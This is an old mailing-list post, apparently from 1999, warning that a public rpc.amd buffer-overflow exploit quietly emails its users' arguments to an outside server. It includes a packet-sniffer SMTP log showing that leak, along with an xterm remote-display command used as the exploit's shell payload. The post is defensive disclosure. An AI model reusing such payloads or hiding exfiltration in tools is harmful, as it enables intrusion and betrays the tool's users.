Hello, Sorry if this was already known, recently Someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount) While testing this exploit on my on server, i saw that i was opening a connection to ohhara.postech.ac.kr on port 25, After a little research i found out that The exploit (In it's original form) was sending an email to [EMAIL PROTECTED] and listing the arguments i just entered, There is an easy way to stop it from sending Just comment the line: system(cmd); Here's the log as i got it from sniffit: EHLO BlackMesa.com MAIL From:<[EMAIL PROTECTED]> SIZE=95 RCPT To:<[EMAIL PROTECTED]> DATA Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for [EMAIL PROTECTED]; Sat, 4 Sep 1999 05:30:56 +0200 Date: Sat, 4 Sep 1999 05:30:56 +0200 From: locke <[EMAIL PROTECTED]> Message-Id: <[EMAIL PROTECTED]> To: [EMAIL PROTECTED] 10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0 . QUIT QUIT (Ip's changed to protect the innocent) Bye